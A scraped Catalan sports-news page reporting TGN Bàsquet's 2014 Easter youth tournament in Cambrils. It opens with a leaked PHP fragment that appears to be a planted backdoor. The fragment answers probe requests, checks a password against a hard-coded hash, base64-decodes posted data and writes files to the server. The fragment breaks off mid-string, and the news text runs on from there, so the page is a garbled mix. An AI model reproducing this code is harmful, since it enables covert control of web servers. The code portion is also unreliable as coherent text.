function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet presenta el torneig de Setmana Santa a Cambrils - Tgn Bàsquet Club -

El TGN Bàsquet presenta el torneig de Setmana Santa a Cambrils

By
Updated: abril 8, 2014

El regidor d’Esports, Lluís Abella, i el vicepresident del TGN Bàsquet, Iñaki Liarte, han presentat avui el Torneig Internacional del club lila i han destacat la internacionalització de la competició amb la participació del Toulousse Travel Team (França), que ja és un habitual, i el St Mirren de Paisley (Escòcia), que és la novetat d’aquest 2014. Enguany també s’ha apuntat al torneig per primera vegada un equip de la Comunitat de Madrid. El conjunt aleví femení del Distrito 21, actual campió de la lliga de Madrid en la seva categoria, buscarà rival a les pistes de Cambrils. “Hem augmentat el volum d’equips respecte a l’any passat. Estem contents d’haver recuperat els equips aragonesos, que l’any passat no van poder venir per incompatibilitat en les dates i enguany, malgrat haver participat en d’altres tornejos l’any passat, han decidit tornar, això vol dir que fem les coses bé”, diu Iñaki Liarte.

L’onzena edició de la competició portarà al municipi més de 500 jugadors i jugadores d’entre 10 i 14 anys d’un total de 47 equips de diferents de diferents punts de Catalunya, Espanya i Europa que disputaran 120 partits. Els nens i nenes vindran amb 60 tècnics, 40 persones d’organització i més de 300 acompanyants, que també s’allotjaran a Cambrils. “Un fet destacable és la presència de molts pares que han decidit allotjar-se en els hotels que nosaltres oferim, un fet que valorem molt positivament perquè això vol dir que confien en la nostra organització”, explica Liarte.

Entre els 20 clubs representats, també hi ha els aragonesos Stadium Casablanca, Doctor Azua, CD Romareda i El Salvador; els catalans com Parets, SESE, AE Badalonès, AEC Collblanc, CE Sant Nicolau, CB Lleida, CB Vilassar de Dalt, i els tarragonins CB Altafulla, La Salle Tarragona, Reus Ploms, l’escola Maria Cortina, Puigcerver-Salle Reus i CB Cambrils.

El regidor d’Esports, Lluís Abella, s’ha mostrat satisfet d’acollir un any més el torneig i ha explicat que és un atractiu més pels visitants de Cambrils que potencia el segell de Destinació de Turisme Esportiu. Abella també ha afirmat que la convivència entre tots els equips és molt interessant per facilitar les sinèrgies en el món del bàsquet. Finalment, ha qualificat de bona notícia que més de la meitat dels equips (27 de 47) siguin femenins, que demostra que les dones estan entrant amb força al món de l’esport de competició.

Per la seva banda, el vicepresident del TGN Bàsquet ha agraït la col·laboració de Cambrils per “posar-ho tan fàcil” i també ha volgut posar èmfasi en els enriquidors intercanvis entre equips de diferents procedències, que tenen molts moments per conversar gràcies a compartir el mateix allotjament.  El club gestiona tota l’estada en dos hotels, un pels jugadors i l’altre pels acompanyants.

Programa

El torneig s’inicia divendres 11 amb l’arribada dels equips i dissabte a partir de les 9 del matí comencen a jugar. Dilluns tots els participants aniran a les instal·lacions del Port Aventura, dimarts continua el torneig amb les fases finals i dimecres 16 es juguen totes les finals per a donar per finalitzat el torneig a les 14 hores.

CALENDARI I HORARIS

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *